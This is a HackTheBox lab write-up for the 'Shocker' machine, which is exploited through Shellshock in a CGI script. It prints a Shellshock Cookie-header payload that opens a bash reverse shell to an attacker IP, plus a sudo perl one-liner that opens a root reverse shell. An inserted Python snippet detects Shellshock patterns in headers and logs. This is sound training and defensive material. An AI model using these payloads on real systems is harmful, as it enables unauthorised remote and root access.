HackTheBox - Shocker

Updated 29-03-2026

A Linux machine where directory enumeration uncovers a CGI script in an exposed cgi-bin directory — and a classic Bash vulnerability allows injecting commands through a crafted HTTP header.

Recon

Nmap

$ target=10.129.12.47; ports=$(nmap -p- --min-rate=1000 -T4 "$target" 2>/dev/null | awk -F/ '/^[0-9]+\/tcp/ && /open/ {print $1}' | paste -sd, -); nmap -p"$ports" -sC -sV "$target"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-17 06:16 EST
Nmap scan report for 10.129.12.47
Host is up (0.20s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.55 seconds

Foothold

Web Enumeration

Enumerating directories using ffuf reveals the cgi-bin directory.

$ ffuf -c -u http://10.129.12.47/FUZZ -w /usr/share/dirb/wordlists/common.txt

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.129.12.47/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 137, Words: 9, Lines: 10, Duration: 135ms]
.hta [Status: 403, Size: 291, Words: 22, Lines: 12, Duration: 261ms]
.htaccess [Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 264ms]
.htpasswd [Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 271ms]
cgi-bin/ [Status: 403, Size: 295, Words: 22, Lines: 12, Duration: 160ms]
index.html [Status: 200, Size: 137, Words: 9, Lines: 10, Duration: 170ms]
server-status [Status: 403, Size: 300, Words: 22, Lines: 12, Duration: 163ms]
:: Progress: [4614/4614] :: Job [1/1] :: 237 req/sec :: Duration: [0:00:17] :: Errors: 0 ::

CGI Enumeration

Next, enumerate cgi-bin for scripts/binaries.

$ ffuf -c -u http://10.129.12.47/cgi-bin/FUZZ -w /usr/share/dirb/wordlists/common.txt -e .cgi,.pl,.py,.sh -fc 403

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.129.12.47/cgi-bin/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Extensions : .cgi .pl .py .sh
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________

user.sh [Status: 200, Size: 118, Words: 19, Lines: 8, Duration: 202ms]

A Bash script named user.sh is accessible. Requesting it with curl shows that it is an uptime test script, which means the web server hands the request to Bash.

$ curl http://10.129.12.47/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

07:36:35 up 1:24, 0 users, load average: 0.00, 0.00, 0.00

Exploit

If we look at HackTricks’ CGI Pentesting page, we’ll read about Shellshock.

Shellshock is a vulnerability in the Bash shell. When Bash starts, it imports function definitions from environment variables whose value begins with "() {", and vulnerable versions also execute any commands that follow the function body. A CGI server exports request headers into the script's environment (for example the Cookie header becomes HTTP_COOKIE), so a crafted header value reaches Bash and is executed with the web server's privileges.

HackTricks lists an out-of-band payload that uses the Cookie header as an alternative to User-Agent; we can use it to get a reverse shell.

Start a listener:

$ nc -lnvp 4242

Send the malicious curl request:

$ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.16.103/4242 0>&1' http://10.129.12.47/cgi-bin/user.sh

The listener receives a shell, and we can grab the user flag.

$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.16.103] from (UNKNOWN) [10.129.12.47] 40776
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$
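The exploit above works because the CGI server copies request headers into environment variables and Bash executes the commands trailing a "() {" function definition. The following detection logic is an added example, not part of the original writeup: it flags request headers, and Apache combined-log entries, whose value starts a Bash function definition. The log lines and header values are constructed samples; the Cookie header is not in Apache's default combined format, so log-based detection only covers that vector if the LogFormat also records %{Cookie}i.

```python
import re

# A Shellshock payload begins with an exported-function definition, "() {",
# followed by a body and then the commands Bash wrongly executes. The pattern
# also tolerates spacing variants such as "(){".
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

def scan_request(headers):
    """Return the names of request headers that carry a Bash function definition.

    Every header reaches a CGI script as an HTTP_* environment variable, so any
    header (Cookie, User-Agent, Referer, ...) is a possible injection point.
    """
    return [name for name, value in headers.items() if SHELLSHOCK_RE.search(value)]

def scan_access_log(lines):
    """Return Apache combined-log lines whose quoted fields contain the prefix.

    Quoted fields are the request line, Referer and User-Agent by default;
    Apache escapes embedded quotes as \\", which the field regex accepts.
    """
    field_re = re.compile(r'"((?:[^"\\]|\\.)*)"')
    return [line for line in lines
            if any(SHELLSHOCK_RE.search(f) for f in field_re.findall(line))]

# Constructed sample data: one benign request and one carrying the classic
# harmless Shellshock test string in the User-Agent field.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Feb/2026:07:36:35 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/8.5.0"',
    '10.0.0.5 - - [17/Feb/2026:07:40:01 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo test"',
]

SAMPLE_HEADERS = {
    "Host": "10.129.12.47",
    "User-Agent": "curl/8.5.0",
    "Cookie": "() { :;}; echo test",   # constructed: benign test payload in the page's vector
}

if __name__ == "__main__":
    print("suspicious headers:", scan_request(SAMPLE_HEADERS))
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious log entry:", hit)
```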

Privilege Escalation

Sudo Rights

Checking sudo permissions shows shelly can run /usr/bin/perl as root without a password.

shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl

This allows a root reverse shell via sudo perl.

Root Shell

Start another listener on the attacker machine:

$ nc -lnvp 1111

Run perl with sudo using the reverse shell payload:

shelly@Shocker:/usr/lib/cgi-bin$ sudo perl -e 'use Socket;$i="10.10.16.103";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'

The listener receives a root shell:

$ nc -lnvp 1111
listening on [any] 1111 ...
connect to [10.10.16.103] from (UNKNOWN) [10.129.12.47] 52318
bash: no job control in this shell
root@Shocker:/usr/lib/cgi-bin#